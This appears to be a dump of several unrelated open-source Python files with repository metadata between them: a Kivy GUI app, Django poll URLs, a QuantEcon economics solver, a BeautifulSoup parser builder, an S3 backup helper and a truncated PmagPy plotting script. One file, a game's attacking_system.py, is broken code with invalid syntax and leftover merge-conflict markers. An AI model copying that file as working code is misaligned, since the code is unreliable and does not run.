self.getmaxwidth_gui_hook = self.main_panel.getmaxwidth_gui_hook
# Clear display hook
self.cleardisplay_gui_hook = self.main_panel.cleardisplay_gui_hook
# Update progress bar
self.cmdprog_gui_hook = self.main_panel.cmdprog_gui_hook
# Register CMD hooks
self.main_panel.register_handleinput_cmd_hook(
handleinput_cmd_hook)
self.main_panel.register_getcommands_cmd_hook(
getcommands_cmd_hook)
self.side_panel.register_handleinput_cmd_hook(
handleinput_cmd_hook)
def build(self):
"Build the kivy App."
# Set title
self.title = "CryptikChaos"
# Add main and side pane
self.drawer.add_widget(self.side_panel)
self.drawer.add_widget(self.main_panel)
# Set animation type
self.drawer.anim_type = 'slide_above_anim'
# Bind Keyboard hook
self.bind(on_start=self.post_build_init)
return self.drawer
def on_start(self):
'''Event handler for the on_start event, which is fired after
initialization (after build() has been called), and before the
application is being run.
'''
Logger.debug("GUI: Cryptikchaos Client started.")
# Print criptikchaos banner
Clock.schedule_once(self.print_logo, 1)
def on_stop(self):
'''Event handler for the on_stop event, which is fired when the
application has finished running (e.g. the window is about to be
closed).
'''
Logger.debug("GUI: Stopped Cryptikchaos Client.")
def on_pause(self):
return True
def on_resume(self):
pass
def print_logo(self, *args):
"Print the criptikchaos logo."
if constants.GUI_LOGO:
# Print logo through log
Logger.info('GUI: \n{}'.format(constants.GUI_LOGO))
return args
def post_build_init(self, *args):
if constants.PLATFORM_ANDROID:
import android
android.map_key(android.KEYCODE_BACK, 1001)
win = Window
win.bind(on_keyboard=self.my_key_handler)
def toggle_drawer_state(self):
if self.drawer.state == "open":
self.drawer.anim_to_state("closed")
else:
self.drawer.anim_to_state("open")
def my_key_handler(self, window, keycode1, keycode2, text, modifiers):
#Logger.debug("H/W Keypress: {}".format(keycode1))
if keycode1 in [27, 1001]:
# Go to console screen or close app
if self.drawer.state == "open":
self.drawer.anim_to_state("closed")
elif self.main_panel.is_console_focused():
self.stop()
else:
self.main_panel.goto_console_screen()
return True
elif keycode1 == 319:
# Open navbar with menu key
self.toggle_drawer_state()
return True
else:
return False
|
gpl-3.0
| 6,267,618,879,123,569,000
| 28.085561
| 77
| 0.627689
| false
| 3.806158
| false
| false
| false
|
silenius/amnesia
|
amnesia/modules/folder/orders.py
|
1
|
1754
|
# -*- coding: utf-8 -*-
from amnesia.modules.content import Content
from amnesia.modules.content_type import ContentType
from amnesia.modules.event import Event
from amnesia.modules.account import Account
#from amnesia.modules.country import Country
from amnesia.order import EntityOrder
from amnesia.order import Path
def includeme(config):
config.include('amnesia.modules.content.mapper')
config.include('amnesia.modules.account.mapper')
config.include('amnesia.modules.event.mapper')
config.registry.settings['amnesia:orders'] = {
'title': EntityOrder(Content, 'title', 'asc', doc='title'),
'weight': EntityOrder(Content, 'weight', 'desc', doc='default'),
'update': EntityOrder(
Content, 'last_update', 'desc', doc='last update'
),
'added': EntityOrder(Content, 'added', 'desc', doc='added date'),
'type': EntityOrder(
ContentType, 'name', 'asc', path=[Path(Content, 'type')],
doc='content type'
),
'owner': EntityOrder(Account, 'login', 'asc', path=[Path(Content,
'owner')],
doc='owner'),
'starts': EntityOrder(Event, 'starts', 'desc', doc='event starts'),
'ends': EntityOrder(Event, 'ends', 'desc', doc='event ends'),
# 'country' : EntityOrder(Country, 'name', 'asc', path=[Path(Event,
# 'country')],
# doc='event country'),
# 'major' : EntityOrder(MimeMajor, 'name', 'asc',
# path=[Path(File, 'mime'), Path(Mime, 'major')],
# doc='mime')
}
|
bsd-2-clause
| -7,095,688,458,044,918,000
| 41.780488
| 80
| 0.54618
| false
| 4.088578
| false
| false
| false
|
theneurasthenicrat/whale4
|
polls/urls.py
|
1
|
2490
|
# -*- coding: utf-8 -*-
from django.conf.urls import url
from django.views.generic import TemplateView
from polls import views
uuid4="[a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12}"
urlpatterns = [
url(r'^$', views.home, name='home'),
url(r'^redirectPage/$', views.redirect_page, name='redirectPage'),
url(r'^choosePollType$', views.choose_poll_type, name='choosePollType'),
url(r'^candidateCreate/('+uuid4+')/$', views.candidate_create, name='candidateCreate'),
url(r'^dateCandidateCreate/('+uuid4+')/$', views.date_candidate_create, name='dateCandidateCreate'),
url(r'^manageCandidate/('+uuid4+')/$', views.manage_candidate, name='manageCandidate'),
url(r'^updatePoll/(' + uuid4 +')/$', views.update_voting_poll, name='updatePoll'),
url(r'^deleteCandidate/('+uuid4+')/([^/]+)/$', views.delete_candidate, name='deleteCandidate'),
url(r'^updateVote/('+uuid4+')/([^/]+)/$', views.update_vote, name='updateVote'),
url(r'^deleteVote/('+uuid4+')/([^/]+)/$', views.delete_vote, name='deleteVote'),
url(r'^deleteAnonymous/('+uuid4+')/([^/]+)/$', views.delete_anonymous, name='deleteAnonymous'),
url(r'^newPoll/(?P<choice>[^/]+)/$', views.new_poll, name='newPoll'),
url(r'^viewPoll/('+uuid4+')', views.view_poll, name='viewPoll'),
url(r'^status/('+uuid4+')', views.status, name='status'),
url(r'^viewPollSecret/('+uuid4+')/([^/]+)/$', views.view_poll_secret, name='viewPollSecret'),
url(r'^vote/('+uuid4+')', views.vote, name='vote'),
url(r'^invitation/('+uuid4+')/$', views.invitation, name='invitation'),
url(r'^admin/('+uuid4+')/$', views.admin_poll, name='admin'),
url(r'^resetPoll/('+uuid4+')/$', views.reset_poll, name='resetPoll'),
url(r'^advancedParameters/('+uuid4+')/$', views.advanced_parameters, name='advancedParameters'),
url(r'^deleteVotingPoll/(' + uuid4 +')/$', views.delete_poll, name='deleteVotingPoll'),
url(r'^certificate/('+uuid4+')', views.certificate, name='certificate'),
url(r'^results/('+uuid4+')', views.result_all, name='results'),
url(r'^viewResult/('+uuid4+')/([^/]+)/$', views.result_view, name='viewResult'),
url(r'^scores/('+uuid4+')/([^/]+)/$', views.result_scores, name='scores'),
url(r'^data/('+uuid4+')', views.data_page, name='data'),
url(r'^allData$', TemplateView.as_view(template_name='polls/all_data.html'), name='allData'),
url(r'^about$', TemplateView.as_view(template_name='polls/about.html'), name='about'),
]
|
gpl-3.0
| -2,989,620,190,023,986,000
| 64.526316
| 104
| 0.627711
| false
| 3.104738
| false
| true
| false
|
oyamad/QuantEcon.py
|
quantecon/dle.py
|
1
|
14017
|
"""
Provides a class called DLE to convert and solve dynamic linear economics
(as set out in Hansen & Sargent (2013)) as LQ problems.
"""
import numpy as np
from .lqcontrol import LQ
from .matrix_eqn import solve_discrete_lyapunov
from .rank_nullspace import nullspace
class DLE(object):
r"""
This class is for analyzing dynamic linear economies, as set out in Hansen & Sargent (2013).
The planner's problem is to choose \{c_t, s_t, i_t, h_t, k_t, g_t\}_{t=0}^\infty to maximize
\max -(1/2) \mathbb{E} \sum_{t=0}^{\infty} \beta^t [(s_t - b_t).(s_t-b_t) + g_t.g_t]
subject to the linear constraints
\Phi_c c_t + \Phi_g g_t + \Phi_i i_t = \Gamma k_{t-1} + d_t
k_t = \Delta_k k_{t-1} + \Theta_k i_t
h_t = \Delta_h h_{t-1} + \Theta_h c_t
s_t = \Lambda h_{t-1} + \Pi c_t
and
z_{t+1} = A_{22} z_t + C_2 w_{t+1}
b_t = U_b z_t
d_t = U_d z_t
where h_{-1}, k_{-1}, and z_0 are given as initial conditions.
Section 5.5 of HS2013 describes how to map these matrices into those of
a LQ problem.
HS2013 sort the matrices defining the problem into three groups:
Information: A_{22}, C_2, U_b , and U_d characterize the motion of information
sets and of taste and technology shocks
Technology: \Phi_c, \Phi_g, \Phi_i, \Gamma, \Delta_k, and \Theta_k determine the
technology for producing consumption goods
Preferences: \Delta_h, \Theta_h, \Lambda, and \Pi determine the technology for
producing consumption services from consumer goods. A scalar discount factor \beta
determines the preference ordering over consumption services.
Parameters
----------
Information : tuple
Information is a tuple containing the matrices A_{22}, C_2, U_b, and U_d
Technology : tuple
Technology is a tuple containing the matrices \Phi_c, \Phi_g, \Phi_i, \Gamma,
\Delta_k, and \Theta_k
Preferences : tuple
Preferences is a tuple containing the matrices \Delta_h, \Theta_h, \Lambda,
\Pi, and the scalar \beta
"""
def __init__(self, information, technology, preferences):
# === Unpack the tuples which define information, technology and preferences === #
self.a22, self.c2, self.ub, self.ud = information
self.phic, self.phig, self.phii, self.gamma, self.deltak, self.thetak = technology
self.beta, self.llambda, self.pih, self.deltah, self.thetah = preferences
# === Computation of the dimension of the structural parameter matrices === #
self.nb, self.nh = self.llambda.shape
self.nd, self.nc = self.phic.shape
self.nz, self.nw = self.c2.shape
junk, self.ng = self.phig.shape
self.nk, self.ni = self.thetak.shape
# === Creation of various useful matrices === #
uc = np.hstack((np.eye(self.nc), np.zeros((self.nc, self.ng))))
ug = np.hstack((np.zeros((self.ng, self.nc)), np.eye(self.ng)))
phiin = np.linalg.inv(np.hstack((self.phic, self.phig)))
phiinc = uc.dot(phiin)
phiing = ug.dot(phiin)
b11 = - self.thetah.dot(phiinc).dot(self.phii)
a1 = self.thetah.dot(phiinc).dot(self.gamma)
a12 = np.vstack((self.thetah.dot(phiinc).dot(
self.ud), np.zeros((self.nk, self.nz))))
# === Creation of the A Matrix for the state transition of the LQ problem === #
a11 = np.vstack((np.hstack((self.deltah, a1)), np.hstack(
(np.zeros((self.nk, self.nh)), self.deltak))))
self.A = np.vstack((np.hstack((a11, a12)), np.hstack(
(np.zeros((self.nz, self.nk + self.nh)), self.a22))))
# === Creation of the B Matrix for the state transition of the LQ problem === #
b1 = np.vstack((b11, self.thetak))
self.B = np.vstack((b1, np.zeros((self.nz, self.ni))))
# === Creation of the C Matrix for the state transition of the LQ problem === #
self.C = np.vstack((np.zeros((self.nk + self.nh, self.nw)), self.c2))
# === Define R,W and Q for the payoff function of the LQ problem === #
self.H = np.hstack((self.llambda, self.pih.dot(uc).dot(phiin).dot(self.gamma), self.pih.dot(
uc).dot(phiin).dot(self.ud) - self.ub, -self.pih.dot(uc).dot(phiin).dot(self.phii)))
self.G = ug.dot(phiin).dot(
np.hstack((np.zeros((self.nd, self.nh)), self.gamma, self.ud, -self.phii)))
self.S = (self.G.T.dot(self.G) + self.H.T.dot(self.H)) / 2
self.nx = self.nh + self.nk + self.nz
self.n = self.ni + self.nh + self.nk + self.nz
self.R = self.S[0:self.nx, 0:self.nx]
self.W = self.S[self.nx:self.n, 0:self.nx]
self.Q = self.S[self.nx:self.n, self.nx:self.n]
# === Use quantecon's LQ code to solve our LQ problem === #
lq = LQ(self.Q, self.R, self.A, self.B,
self.C, N=self.W, beta=self.beta)
self.P, self.F, self.d = lq.stationary_values()
# === Construct output matrices for our economy using the solution to the LQ problem === #
self.A0 = self.A - self.B.dot(self.F)
self.Sh = self.A0[0:self.nh, 0:self.nx]
self.Sk = self.A0[self.nh:self.nh + self.nk, 0:self.nx]
self.Sk1 = np.hstack((np.zeros((self.nk, self.nh)), np.eye(
self.nk), np.zeros((self.nk, self.nz))))
self.Si = -self.F
self.Sd = np.hstack((np.zeros((self.nd, self.nh + self.nk)), self.ud))
self.Sb = np.hstack((np.zeros((self.nb, self.nh + self.nk)), self.ub))
self.Sc = uc.dot(phiin).dot(-self.phii.dot(self.Si) +
self.gamma.dot(self.Sk1) + self.Sd)
self.Sg = ug.dot(phiin).dot(-self.phii.dot(self.Si) +
self.gamma.dot(self.Sk1) + self.Sd)
self.Ss = self.llambda.dot(np.hstack((np.eye(self.nh), np.zeros(
(self.nh, self.nk + self.nz))))) + self.pih.dot(self.Sc)
# === Calculate eigenvalues of A0 === #
self.A110 = self.A0[0:self.nh + self.nk, 0:self.nh + self.nk]
self.endo = np.linalg.eigvals(self.A110)
self.exo = np.linalg.eigvals(self.a22)
# === Construct matrices for Lagrange Multipliers === #
self.Mk = -2 * np.asscalar(self.beta) * (np.hstack((np.zeros((self.nk, self.nh)), np.eye(
self.nk), np.zeros((self.nk, self.nz))))).dot(self.P).dot(self.A0)
self.Mh = -2 * np.asscalar(self.beta) * (np.hstack((np.eye(self.nh), np.zeros(
(self.nh, self.nk)), np.zeros((self.nh, self.nz))))).dot(self.P).dot(self.A0)
self.Ms = -(self.Sb - self.Ss)
self.Md = -(np.linalg.inv(np.vstack((self.phic.T, self.phig.T))).dot(
np.vstack((self.thetah.T.dot(self.Mh) + self.pih.T.dot(self.Ms), -self.Sg))))
self.Mc = -(self.thetah.T.dot(self.Mh) + self.pih.T.dot(self.Ms))
self.Mi = -(self.thetak.T.dot(self.Mk))
def compute_steadystate(self, nnc=2):
"""
Computes the non-stochastic steady-state of the economy.
Parameters
----------
nnc : array_like(float)
nnc is the location of the constant in the state vector x_t
"""
zx = np.eye(self.A0.shape[0])-self.A0
self.zz = nullspace(zx)
self.zz /= self.zz[nnc]
self.css = self.Sc.dot(self.zz)
self.sss = self.Ss.dot(self.zz)
self.iss = self.Si.dot(self.zz)
self.dss = self.Sd.dot(self.zz)
self.bss = self.Sb.dot(self.zz)
self.kss = self.Sk.dot(self.zz)
self.hss = self.Sh.dot(self.zz)
def compute_sequence(self, x0, ts_length=None, Pay=None):
"""
Simulate quantities and prices for the economy
Parameters
----------
x0 : array_like(float)
The initial state
ts_length : scalar(int)
Length of the simulation
Pay : array_like(float)
Vector to price an asset whose payout is Pay*xt
"""
lq = LQ(self.Q, self.R, self.A, self.B,
self.C, N=self.W, beta=self.beta)
xp, up, wp = lq.compute_sequence(x0, ts_length)
self.h = self.Sh.dot(xp)
self.k = self.Sk.dot(xp)
self.i = self.Si.dot(xp)
self.b = self.Sb.dot(xp)
self.d = self.Sd.dot(xp)
self.c = self.Sc.dot(xp)
self.g = self.Sg.dot(xp)
self.s = self.Ss.dot(xp)
# === Value of J-period risk-free bonds === #
# === See p.145: Equation (7.11.2) === #
e1 = np.zeros((1, self.nc))
e1[0, 0] = 1
self.R1_Price = np.empty((ts_length + 1, 1))
self.R2_Price = np.empty((ts_length + 1, 1))
self.R5_Price = np.empty((ts_length + 1, 1))
for i in range(ts_length + 1):
self.R1_Price[i, 0] = self.beta * e1.dot(self.Mc).dot(np.linalg.matrix_power(
self.A0, 1)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
self.R2_Price[i, 0] = self.beta**2 * e1.dot(self.Mc).dot(
np.linalg.matrix_power(self.A0, 2)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
self.R5_Price[i, 0] = self.beta**5 * e1.dot(self.Mc).dot(
np.linalg.matrix_power(self.A0, 5)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
# === Gross rates of return on 1-period risk-free bonds === #
self.R1_Gross = 1 / self.R1_Price
# === Net rates of return on J-period risk-free bonds === #
# === See p.148: log of gross rate of return, divided by j === #
self.R1_Net = np.log(1 / self.R1_Price) / 1
self.R2_Net = np.log(1 / self.R2_Price) / 2
self.R5_Net = np.log(1 / self.R5_Price) / 5
# === Value of asset whose payout vector is Pay*xt === #
# See p.145: Equation (7.11.1)
if isinstance(Pay, np.ndarray) == True:
self.Za = Pay.T.dot(self.Mc)
self.Q = solve_discrete_lyapunov(
self.A0.T * self.beta**0.5, self.Za)
self.q = self.beta / (1 - self.beta) * \
np.trace(self.C.T.dot(self.Q).dot(self.C))
self.Pay_Price = np.empty((ts_length + 1, 1))
self.Pay_Gross = np.empty((ts_length + 1, 1))
self.Pay_Gross[0, 0] = np.nan
for i in range(ts_length + 1):
self.Pay_Price[i, 0] = (xp[:, i].T.dot(self.Q).dot(
xp[:, i]) + self.q) / e1.dot(self.Mc).dot(xp[:, i])
for i in range(ts_length):
self.Pay_Gross[i + 1, 0] = self.Pay_Price[i + 1,
0] / (self.Pay_Price[i, 0] - Pay.dot(xp[:, i]))
return
def irf(self, ts_length=100, shock=None):
"""
Create Impulse Response Functions
Parameters
----------
ts_length : scalar(int)
Number of periods to calculate IRF
Shock : array_like(float)
Vector of shocks to calculate IRF to. Default is first element of w
"""
if type(shock) != np.ndarray:
# Default is to select first element of w
shock = np.vstack((np.ones((1, 1)), np.zeros((self.nw - 1, 1))))
self.c_irf = np.empty((ts_length, self.nc))
self.s_irf = np.empty((ts_length, self.nb))
self.i_irf = np.empty((ts_length, self.ni))
self.k_irf = np.empty((ts_length, self.nk))
self.h_irf = np.empty((ts_length, self.nh))
self.g_irf = np.empty((ts_length, self.ng))
self.d_irf = np.empty((ts_length, self.nd))
self.b_irf = np.empty((ts_length, self.nb))
for i in range(ts_length):
self.c_irf[i, :] = self.Sc.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.s_irf[i, :] = self.Ss.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.i_irf[i, :] = self.Si.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.k_irf[i, :] = self.Sk.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.h_irf[i, :] = self.Sh.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.g_irf[i, :] = self.Sg.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.d_irf[i, :] = self.Sd.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.b_irf[i, :] = self.Sb.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
return
def canonical(self):
"""
Compute canonical preference representation
Uses auxiliary problem of 9.4.2, with the preference shock process reintroduced
Calculates pihat, llambdahat and ubhat for the equivalent canonical household technology
"""
Ac1 = np.hstack((self.deltah, np.zeros((self.nh, self.nz))))
Ac2 = np.hstack((np.zeros((self.nz, self.nh)), self.a22))
Ac = np.vstack((Ac1, Ac2))
Bc = np.vstack((self.thetah, np.zeros((self.nz, self.nc))))
Cc = np.vstack((np.zeros((self.nh, self.nw)), self.c2))
Rc1 = np.hstack((self.llambda.T.dot(self.llambda), -
self.llambda.T.dot(self.ub)))
Rc2 = np.hstack((-self.ub.T.dot(self.llambda), self.ub.T.dot(self.ub)))
Rc = np.vstack((Rc1, Rc2))
Qc = self.pih.T.dot(self.pih)
Nc = np.hstack(
(self.pih.T.dot(self.llambda), -self.pih.T.dot(self.ub)))
lq_aux = LQ(Qc, Rc, Ac, Bc, N=Nc, beta=self.beta)
P1, F1, d1 = lq_aux.stationary_values()
self.F_b = F1[:, 0:self.nh]
self.F_f = F1[:, self.nh:]
self.pihat = np.linalg.cholesky(self.pih.T.dot(
self.pih) + self.beta.dot(self.thetah.T).dot(P1[0:self.nh, 0:self.nh]).dot(self.thetah)).T
self.llambdahat = self.pihat.dot(self.F_b)
self.ubhat = - self.pihat.dot(self.F_f)
return
|
bsd-3-clause
| 668,505,785,645,585,400
| 41.475758
| 105
| 0.552615
| false
| 2.883563
| false
| false
| false
|
TheMuffinMan5930/NarutoBattle
|
attacking_system.py
|
1
|
1259
|
import gspread
import "https://github.com/TheMuffinMan5930/NarutoBattle/blob/master/Chat.py"
Jitsu_Player = sh.worksheet(Player_Name + "- Jitsus")
i = 1
while True:
exec("Jit" + i + " = worksheet.acell(" + i.string.ascii_uppercase.index(i - 1).value + "2)")
i += 1
confirmation_of_jitsus = input("Is it correct that you have {}, {}, {}, {}, {}, {}, {} as your ttjitsus? Y/N".format(Jit1, Jit2, Jit3, Jit4, Jit5, Jit6, Jit7))
if confirmation_of_jitsus == Y
worksheet.update.cell("Ready")
elif confirmation_of_jitsus == N
QuitGame() # Def this aswell
except:
print("Error")
# turn progressing code here
# this is just the code I CAN do.
class Attack(object)
def __init__(self)
self.coordinates_of_Jitsu = wsJitsus.cell( : , :)
self.range = wsJitsus.cell( , ,)#blah, Blah plus syntax check for 19 - 22ish
self.damage = wsJitsus.cell( , ,)
self.chakra_cost = wsJitsus.cell( , ,) #other attributes
self.aim = wsJitsus.cell( , ,)
self.Jitsu_Name = wsJitsus.cell( , ,)
self.purchase_cost = wsJitsus.cell( , ,)
self.Jitsu_Rank = wsJitsus.cell( , ,)
<<<<<<< HEAD:Attacking System.py
def __str__(self)
return("Your Jitsu has {}d".format(Jitsu))
=======
>>>>>>> 7723f44702a9a1e3e4c3431c136d1ad136bda8c4:attacking_system.py
|
mit
| -8,263,799,134,107,539,000
| 37.030303
| 159
| 0.661355
| false
| 2.52008
| false
| false
| false
|
chimkentec/KodiMODo_rep
|
script.module.xbmcup/lib/xbmcup/bsoup4/builder/_htmlparser.py
|
1
|
8347
|
"""Use the HTMLParser library to parse HTML files that aren't too bad."""
__all__ = [
'HTMLParserTreeBuilder',
]
from HTMLParser import (
HTMLParser,
HTMLParseError,
)
import sys
import warnings
# Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
# argument, which we'd like to set to False. Unfortunately,
# http://bugs.python.org/issue13273 makes strict=True a better bet
# before Python 3.2.3.
#
# At the end of this file, we monkeypatch HTMLParser so that
# strict=True works well on Python 3.2.2.
major, minor, release = sys.version_info[:3]
CONSTRUCTOR_TAKES_STRICT = (
major > 3
or (major == 3 and minor > 2)
or (major == 3 and minor == 2 and release >= 3))
from ..element import (
CData,
Comment,
Declaration,
Doctype,
ProcessingInstruction,
)
from ..dammit import EntitySubstitution, UnicodeDammit
from ..builder import (
HTML,
HTMLTreeBuilder,
STRICT,
)
HTMLPARSER = 'html.parser'
class BeautifulSoupHTMLParser(HTMLParser):
def handle_starttag(self, name, attrs):
# XXX namespace
self.soup.handle_starttag(name, None, None, dict(attrs))
def handle_endtag(self, name):
self.soup.handle_endtag(name)
def handle_data(self, data):
self.soup.handle_data(data)
def handle_charref(self, name):
# XXX workaround for a bug in HTMLParser. Remove this once
# it's fixed.
if name.startswith('x'):
real_name = int(name.lstrip('x'), 16)
else:
real_name = int(name)
try:
data = unichr(real_name)
except (ValueError, OverflowError), e:
data = u"\N{REPLACEMENT CHARACTER}"
self.handle_data(data)
def handle_entityref(self, name):
character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
if character is not None:
data = character
else:
data = "&%s;" % name
self.handle_data(data)
def handle_comment(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(Comment)
def handle_decl(self, data):
self.soup.endData()
if data.startswith("DOCTYPE "):
data = data[len("DOCTYPE "):]
self.soup.handle_data(data)
self.soup.endData(Doctype)
def unknown_decl(self, data):
if data.upper().startswith('CDATA['):
cls = CData
data = data[len('CDATA['):]
else:
cls = Declaration
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(cls)
def handle_pi(self, data):
self.soup.endData()
if data.endswith("?") and data.lower().startswith("xml"):
# "An XHTML processing instruction using the trailing '?'
# will cause the '?' to be included in data." - HTMLParser
# docs.
#
# Strip the question mark so we don't end up with two
# question marks.
data = data[:-1]
self.soup.handle_data(data)
self.soup.endData(ProcessingInstruction)
class HTMLParserTreeBuilder(HTMLTreeBuilder):
is_xml = False
features = [HTML, STRICT, HTMLPARSER]
def __init__(self, *args, **kwargs):
if CONSTRUCTOR_TAKES_STRICT:
kwargs['strict'] = False
self.parser_args = (args, kwargs)
def prepare_markup(self, markup, user_specified_encoding=None,
document_declared_encoding=None):
"""
:return: A 4-tuple (markup, original encoding, encoding
declared within markup, whether any characters had to be
replaced with REPLACEMENT CHARACTER).
"""
if isinstance(markup, unicode):
return markup, None, None, False
try_encodings = [user_specified_encoding, document_declared_encoding]
dammit = UnicodeDammit(markup, try_encodings, is_html=True)
return (dammit.markup, dammit.original_encoding,
dammit.declared_html_encoding,
dammit.contains_replacement_characters)
def feed(self, markup):
args, kwargs = self.parser_args
parser = BeautifulSoupHTMLParser(*args, **kwargs)
parser.soup = self.soup
try:
parser.feed(markup)
except HTMLParseError, e:
warnings.warn(RuntimeWarning(
"Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
raise e
# Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
# 3.2.3 code. This ensures they don't treat markup like <p></p> as a
# string.
#
# XXX This code can be removed once most Python 3 users are on 3.2.3.
if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
import re
attrfind_tolerant = re.compile(
r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
from html.parser import tagfind, attrfind
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = rawdata[i+1:k].lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
BeautifulSoupHTMLParser.parse_starttag = parse_starttag
BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
CONSTRUCTOR_TAKES_STRICT = True
|
gpl-3.0
| -4,245,565,650,335,776,300
| 33.209016
| 318
| 0.567988
| false
| 3.952178
| false
| false
| false
|
nyodas/enjoliver
|
app/objs3.py
|
1
|
2316
|
"""
Interface with S3 to store / fetch backups
"""
import os
import time
import boto3
import logger
from configs import EnjoliverConfig
class S3Operator(object):
log = logger.get_logger(__file__)
def __init__(self, bucket_name):
ec = EnjoliverConfig(importer=__file__)
aws_id = ec.aws_id
aws_secret = ec.aws_secret
self.bucket_name = bucket_name
if not bucket_name:
self.log.error("bucket_name=%s" % bucket_name)
raise AttributeError("bucket_name is not defined: %s" % bucket_name)
if aws_id is None or aws_secret is None:
self.log.error("Missing the couple AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY")
raise EnvironmentError("Missing the couple AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY")
self.log.info("connect to bucket name: %s" % bucket_name)
self.s3 = boto3.resource('s3')
self.bucket = self.s3.Bucket(bucket_name)
def upload(self, source, dest):
if os.path.isfile(source) is False:
raise IOError(source)
obj = self.s3.Object(self.bucket_name, dest)
stats = os.stat(source)
metadata = {
"uploaded": "%d" % time.time(),
"created": "%d" % stats.st_ctime,
"modified": "%d" % stats.st_mtime,
"size": "%d" % stats.st_size
}
obj.put(Body=open(source, 'rb'), Metadata=metadata)
self.log.info("upload done source: %s dest: %s metadata: %s" % (source, dest, metadata))
def download(self, source, dest):
obj = self.s3.Object(self.bucket_name, source)
r = obj.get(dest)
with open(dest, 'wb') as f:
f.write(r['Body']._raw_stream.data)
self.log.info("download done source: %s source: %s" % (source, dest))
def get_last_uploaded(self, prefix):
keys = []
self.log.debug("prefix use %s" % prefix)
for item in self.bucket.objects.all():
self.log.debug("list in bucket: %s" % item.key)
keys.append({"key": item.key, "last_modified": item.last_modified})
keys.sort(key=lambda k: k["last_modified"])
keys.reverse()
latest = keys[0]
key_name = latest["key"]
self.log.info("return latest upload: %s" % key_name)
return key_name
|
mit
| 7,340,518,615,331,652,000
| 33.058824
| 96
| 0.584629
| false
| 3.487952
| false
| false
| false
|
PmagPy/PmagPy
|
programs/histplot.py
|
1
|
1769
|
#!/usr/bin/env python
from pmagpy import pmag
from pmagpy import pmagplotlib
from matplotlib import pyplot as plt
import sys
import os
import numpy as np
import matplotlib
if matplotlib.get_backend() != "TKAgg":
matplotlib.use("TKAgg")
from pmagpy import ipmag
def main():
"""
NAME
histplot.py
DESCRIPTION
makes histograms for data
OPTIONS
-h prints help message and quits
-f input file name
-b binsize
-fmt [svg,png,pdf,eps,jpg] specify format for image, default is svg
-sav save figure and quit
-F output file name, default is hist.fmt
-N don't normalize
-twin plot both normalized and un-normalized y axes
-xlab Label of X axis
-ylab Label of Y axis
INPUT FORMAT
single variable
SYNTAX
histplot.py [command line options] [<file]
"""
interactive = True
save_plots = False
if '-sav' in sys.argv:
save_plots = True
interactive = False
if '-h' in sys.argv:
print(main.__doc__)
sys.exit()
fmt = pmag.get_named_arg('-fmt', 'svg')
fname = pmag.get_named_arg('-f', '')
outfile = pmag.get_named_arg("-F", "")
norm = 1
